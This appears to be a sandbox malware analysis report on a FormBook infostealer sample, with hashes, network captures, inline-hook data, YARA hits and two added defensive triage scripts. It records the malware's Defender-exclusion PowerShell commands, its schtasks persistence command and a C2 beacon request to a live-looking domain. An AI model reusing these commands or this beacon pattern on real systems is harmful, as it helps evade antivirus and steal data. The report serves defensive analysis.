                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210504180137..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 414408 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe..Process ID: 6424..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210504180137..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe..**********************..Windows PowerShell transcript start..Start time: 20210504180747..Username: computer\user..RunAs User: DESKTOP

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.525234190780704
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:Ms5nQdSz5l.exe
                                                  File size:734720
                                                  MD5:ba01df16e4c876e078348fd4479a8fdf
                                                  SHA1:6c7f20976d3e7d9bf9f8a410cbc54962d1ef52bb
                                                  SHA256:8353e30c6566795da3e5aa38a22b4707ee895cfa115ffa399cfbe7d57d00f91d
                                                  SHA512:7d828277f9dfd39755b015cb25ee713159c2cf9d812ea938b408e0c21b9004b72d9efa21def95dfa307838db56558fd8e507ad10b887e1ed7ca1219a53e8747c
                                                  SSDEEP:12288:OxIvnbBjqfKMpnc2FOAeqL6oPUxMnHIqKG6BcmKd4pC+sO6cHksc5w3sLj19nFY:OVHUxCHIqKG6Bw5yTc5yo19nF
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.2...............P......L........... ... ....@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash:dcb29292c8ccf6c8

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x4b06d6
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp:0xDA32965F [Tue Jan 1 18:33:03 2086 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:v4.0.30319
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al   (repeated for the remaining 97 lines of the preview: the bytes after the CLR stub jump are zero padding, which disassembles to this instruction)

                                                  Data Directories

                                                  Name                                  Virtual Address  Virtual Size  Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT          0xb0684          0x4f          .text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE        0xb2000          0x482c        .rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC       0xb8000          0xc           .reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG           0xb0668          0x1c          .text
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                  Sections

                                                  Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type               Entropy          Characteristics
                                                  .text   0x2000           0xae6dc       0xae800   False     0.80517997851    COM executable for DOS  7.5188778941     IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .rsrc   0xb2000          0x482c        0x4a00    False     0.918549408784   data                    7.81051847098    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc  0xb8000          0xc           0x200     False     0.044921875      data                    0.0815394123432  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  Name           RVA      Size    Type                                                                         Language  Country
                                                  RT_ICON        0xb2130  0x4197  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                  RT_GROUP_ICON  0xb62c8  0x14    data
                                                  RT_VERSION     0xb62dc  0x364   data
                                                  RT_MANIFEST    0xb6640  0x1ea   XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                  Imports

                                                  DLL          Import
                                                  mscoree.dll  _CorExeMain

                                                  Version Infos

                                                  Description       Data
                                                  Translation       0x0000 0x04b0
                                                  LegalCopyright    Copyright 2019
                                                  Assembly Version  1.0.0.0
                                                  InternalName      InvalidCastException.exe
                                                  FileVersion       1.0.0.0
                                                  CompanyName
                                                  LegalTrademarks
                                                  Comments
                                                  ProductName       StarEggControl
                                                  ProductVersion    1.0.0.0
                                                  FileDescription   StarEggControl
                                                  OriginalFilename  InvalidCastException.exe

                                                  Network Behavior

                                                  Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/04/21-18:02:46.816027 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49717 | 34.102.136.180 | 192.168.2.5

                                                  TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2021 18:02:46.634438038 CEST | 49717 | 80 | 192.168.2.5 | 34.102.136.180
May 4, 2021 18:02:46.675184965 CEST | 80 | 49717 | 34.102.136.180 | 192.168.2.5
May 4, 2021 18:02:46.677416086 CEST | 49717 | 80 | 192.168.2.5 | 34.102.136.180
May 4, 2021 18:02:46.677593946 CEST | 49717 | 80 | 192.168.2.5 | 34.102.136.180
May 4, 2021 18:02:46.719705105 CEST | 80 | 49717 | 34.102.136.180 | 192.168.2.5
May 4, 2021 18:02:46.816026926 CEST | 80 | 49717 | 34.102.136.180 | 192.168.2.5
May 4, 2021 18:02:46.816056013 CEST | 80 | 49717 | 34.102.136.180 | 192.168.2.5
May 4, 2021 18:02:46.816281080 CEST | 49717 | 80 | 192.168.2.5 | 34.102.136.180
May 4, 2021 18:02:46.816380978 CEST | 49717 | 80 | 192.168.2.5 | 34.102.136.180
May 4, 2021 18:02:46.859430075 CEST | 80 | 49717 | 34.102.136.180 | 192.168.2.5

                                                  UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2021 18:00:49.907799959 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8
May 4, 2021 18:00:49.956352949 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5
May 4, 2021 18:00:51.020155907 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8
May 4, 2021 18:00:51.071681023 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5
May 4, 2021 18:00:51.750638962 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8
May 4, 2021 18:00:51.804084063 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5
May 4, 2021 18:00:52.373558044 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
May 4, 2021 18:00:52.425172091 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
May 4, 2021 18:00:54.343322992 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
May 4, 2021 18:00:54.403337955 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
May 4, 2021 18:00:55.471920967 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
May 4, 2021 18:00:55.520484924 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
May 4, 2021 18:00:56.800488949 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
May 4, 2021 18:00:56.854403973 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
May 4, 2021 18:01:00.374254942 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
May 4, 2021 18:01:00.422900915 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5
May 4, 2021 18:01:01.839873075 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
May 4, 2021 18:01:01.897089005 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
May 4, 2021 18:01:03.932302952 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8
May 4, 2021 18:01:03.983825922 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5
May 4, 2021 18:01:18.462794065 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8
May 4, 2021 18:01:18.521301985 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5
May 4, 2021 18:01:43.801347017 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8
May 4, 2021 18:01:43.855362892 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5
May 4, 2021 18:02:46.423053026 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8
May 4, 2021 18:02:46.627899885 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5
May 4, 2021 18:03:06.997164011 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8
May 4, 2021 18:03:07.055994034 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5

                                                  DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 4, 2021 18:02:46.423053026 CEST | 192.168.2.5 | 8.8.8.8 | 0xe039 | Standard query (0) | www.safifinancial.info | A (IP address) | IN (0x0001)
May 4, 2021 18:03:06.997164011 CEST | 192.168.2.5 | 8.8.8.8 | 0x87eb | Standard query (0) | www.4980057280880200.xyz | A (IP address) | IN (0x0001)

                                                  DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 4, 2021 18:02:46.627899885 CEST | 8.8.8.8 | 192.168.2.5 | 0xe039 | No error (0) | www.safifinancial.info | safifinancial.info | | CNAME (Canonical name) | IN (0x0001)
May 4, 2021 18:02:46.627899885 CEST | 8.8.8.8 | 192.168.2.5 | 0xe039 | No error (0) | safifinancial.info | | 34.102.136.180 | A (IP address) | IN (0x0001)
May 4, 2021 18:03:07.055994034 CEST | 8.8.8.8 | 192.168.2.5 | 0x87eb | Name error (3) | www.4980057280880200.xyz | none | none | A (IP address) | IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • www.safifinancial.info

                                                  HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49717 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 18:02:46.677593946 CEST | 1301 | OUT | GET /op9s/?kxl0=3OIkoiHCzE1hCgamnAGWyNY23l3GjmrmFj0eumUXTWZXUNP+r8qibU1KsAhTf4lNnle5&kPm0g=K8kX HTTP/1.1
Host: www.safifinancial.info
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 4, 2021 18:02:46.816026926 CEST | 1302 | IN | HTTP/1.1 403 Forbidden
                                                  Server: openresty
                                                  Date: Tue, 04 May 2021 16:02:46 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 275
                                                  ETag: "6089beab-113"
                                                  Via: 1.1 google
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
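The request above is the only HTTP exchange in the capture, and it came from explorer.exe, the process the sample injected into. FormBook works through a list of configured domains in turn, so the 403 from the Google-fronted openresty host and the NXDOMAIN for www.4980057280880200.xyz do not show that no live C2 was reached; the shape of the request is the more durable signal. The script below is an added example for this report, not Joe Sandbox code: it parses the recorded request text, scores it against the shape seen here (short alphanumeric directory, one long base64-like value followed by a short tag, Connection: close with no User-Agent, sent by a process that should not be speaking raw HTTP), and runs a constructed benign request as a control. The regexes, thresholds and client-process list are assumptions tuned to this single observation, not a published FormBook signature.

```python
"""Triage of the HTTP request recorded above for a FormBook-style beacon shape.

Added example for this report, not Joe Sandbox code.  FORMBOOK_REQUEST is the
request text from the HTTP Packets table (explorer.exe -> www.safifinancial.info);
BENIGN_REQUEST is constructed for contrast.  The shape rules and the client
list are assumptions tuned to this one observation; treat the score as a hint.
"""
import re
from urllib.parse import urlsplit

FORMBOOK_REQUEST = (
    "GET /op9s/?kxl0=3OIkoiHCzE1hCgamnAGWyNY23l3GjmrmFj0eumUXTWZXUNP+r8qibU1KsAhTf4lNnle5&kPm0g=K8kX HTTP/1.1\r\n"
    "Host: www.safifinancial.info\r\n"
    "Connection: close\r\n"
    "\r\n"
)
BENIGN_REQUEST = (  # constructed control
    "GET /index.html HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)

PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")          # short random-looking directory, query on its index
LONG_VALUE_RE = re.compile(r"^[A-Za-z0-9+/=_-]{40,}$")  # one long base64-like blob
SHORT_TAG_RE = re.compile(r"^[A-Za-z0-9]{2,8}$")        # short trailing tag
SUSPICIOUS_CLIENTS = {"explorer.exe", "mstsc.exe"}      # assumption: the processes FormBook injected into here

def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, target, version, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}

def split_query(query: str) -> list:
    """Split k=v pairs without percent/plus decoding, so a '+' inside the blob survives."""
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs

def beacon_score(req: dict, process: str):
    """Return (score, reasons); each matched heuristic adds one point."""
    reasons = []
    parts = urlsplit(req["target"])
    params = split_query(parts.query)
    if req["method"] == "GET" and PATH_RE.match(parts.path):
        reasons.append("GET to a short alphanumeric directory with the query on its index")
    if len(params) == 2 and LONG_VALUE_RE.match(params[0][1]) and SHORT_TAG_RE.match(params[1][1]):
        reasons.append("one long base64-like value followed by a short tag")
    hdr = req["headers"]
    if hdr.get("connection", "").lower() == "close" and "user-agent" not in hdr:
        reasons.append("Connection: close and no User-Agent header")
    if process.lower() in SUSPICIOUS_CLIENTS:
        reasons.append(f"issued by {process}")
    return len(reasons), reasons

def triage(samples):
    """samples: iterable of (process, raw_request) -> list of (process, host, score, reasons)."""
    out = []
    for process, raw in samples:
        req = parse_request(raw)
        score, reasons = beacon_score(req, process)
        out.append((process, req["headers"].get("host", ""), score, reasons))
    return out

if __name__ == "__main__":
    for process, host, score, reasons in triage([("explorer.exe", FORMBOOK_REQUEST),
                                                 ("chrome.exe", BENIGN_REQUEST)]):
        print(f"{process:14} {host:26} score={score}  {'; '.join(reasons)}")
```

Fed from proxy logs rather than a raw capture, the same scoring works per request; pair it with the destination (domain age, bare-IP hosts) rather than with the server's reply code, since a 403 or a dead domain is the normal outcome for most entries in a FormBook domain list.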


                                                  Code Manipulations

                                                  User Modules

                                                  Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

                                                  Processes

                                                  Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE3
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE3
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE3
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE3
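The four hooks sit on the message-loop entry points of user32.dll inside explorer.exe, which is how FormBook gets control on every window message without owning a thread of its own. The "New Data" column is the first bytes now found at each function entry. The script below is an added example for this report, not Joe Sandbox code: it converts that column into bytes, names the stub when the bytes start with one of the usual trampolines, and, for a rel32 jump, resolves the destination and asks which loaded module owns it, because a destination outside every module is injected code. The six bytes recorded here are not one of those stubs and the script says so rather than guessing; the module map and the rel32 sample are constructed, and the clean prologues of the hooked functions, which are not on this page, are not assumed.

```python
"""Triage of the inline hooks reported above (user32!PeekMessage*/GetMessage* in explorer.exe).

Added example for this report, not Joe Sandbox code.  SAMPLE_MODULES and the
rel32 sample in __main__ are constructed (explorer.exe's base is the one in the
process table; the other ranges are placeholders).  The clean prologues of the
hooked functions are not on this page, so nothing is assumed about them.
"""
from __future__ import annotations

# Constructed module map for the hooked process: name -> (base, size).
SAMPLE_MODULES = {
    "explorer.exe": (0x7FF693D90000, 0x3C0000),
    "user32.dll": (0x7FFCB0000000, 0x1A0000),
    "ntdll.dll": (0x7FFCB2000000, 0x1F0000),
}

def parse_new_data(text: str) -> bytes:
    """'0x48 0x8B 0xB8 ...' (the table's format) -> bytes."""
    return bytes(int(tok, 16) for tok in text.split())

def classify_stub(data: bytes) -> str:
    """Name the trampoline if the patched bytes start with a common hook stub."""
    if len(data) >= 5 and data[0] == 0xE9:
        return "jmp rel32"
    if len(data) >= 6 and data[:2] == b"\xff\x25":
        return "jmp [rip+disp32]"
    if len(data) >= 12 and data[:2] == b"\x48\xb8" and data[10:12] == b"\xff\xe0":
        return "mov rax, imm64; jmp rax"
    if len(data) >= 6 and data[0] == 0x68 and data[5] == 0xC3:
        return "push imm32; ret"
    return "unrecognised: disassemble manually"

def jmp_rel32_target(func_addr: int, data: bytes) -> int:
    """Destination of an E9 rel32 written at func_addr; rel is relative to the next instruction."""
    rel = int.from_bytes(data[1:5], "little", signed=True)
    return (func_addr + 5 + rel) & 0xFFFFFFFFFFFFFFFF

def owning_module(addr: int, modules: dict) -> str | None:
    """Module whose [base, base+size) contains addr, or None for memory no image backs."""
    for name, (base, size) in modules.items():
        if base <= addr < base + size:
            return name
    return None

def triage_hook(func_addr: int, data: bytes, modules: dict) -> dict:
    """Classify the patch and, for a rel32 jump, say where it lands."""
    verdict = {"stub": classify_stub(data), "target": None, "target_module": None}
    if verdict["stub"] == "jmp rel32":
        verdict["target"] = jmp_rel32_target(func_addr, data)
        verdict["target_module"] = owning_module(verdict["target"], modules)
    return verdict

if __name__ == "__main__":
    # The A and W variants in the table share their bytes pairwise; a placeholder address is used.
    for name, new_data in [("PeekMessageA", "0x48 0x8B 0xB8 0x8D 0xDE 0xE3"),
                           ("PeekMessageW", "0x48 0x8B 0xB8 0x85 0x5E 0xE3")]:
        print(name, triage_hook(0x7FFCB0012340, parse_new_data(new_data), SAMPLE_MODULES))
    # Constructed E9 hook whose destination is backed by no module (injected code).
    rel = (0x7FFC9E000000 - (0x7FFCB0012340 + 5)).to_bytes(4, "little", signed=True)
    print("constructed", triage_hook(0x7FFCB0012340, b"\xe9" + rel, SAMPLE_MODULES))
```

On a live host the inputs come from reading the function's first bytes in the target process and comparing them with the same RVA in the on-disk DLL; a difference is the hook, and the classification above only tells you how to follow it.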


                                                  System Behavior

                                                  General

                                                  Start time:18:00:56
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\Desktop\Ms5nQdSz5l.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
                                                  Imagebase:0xc40000
                                                  File size:734720 bytes
                                                  MD5 hash:BA01DF16E4C876E078348FD4479A8FDF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  General

                                                  Start time:18:01:00
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
                                                  Imagebase:0x9a0000
                                                  File size:430592 bytes
                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:18:01:01
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7ecfc0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:18:01:01
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
                                                  Imagebase:0x9a0000
                                                  File size:430592 bytes
                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:18:01:01
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7ecfc0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:18:01:01
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp7635.tmp'
                                                  Imagebase:0x20000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:18:01:02
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7ecfc0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:18:01:02
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
                                                  Imagebase:0x9a0000
                                                  File size:430592 bytes
                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:18:01:03
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff797770000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:18:01:03
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\Desktop\Ms5nQdSz5l.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\Ms5nQdSz5l.exe
                                                  Imagebase:0x620000
                                                  File size:734720 bytes
                                                  MD5 hash:BA01DF16E4C876E078348FD4479A8FDF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  General

                                                  Start time:18:01:07
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
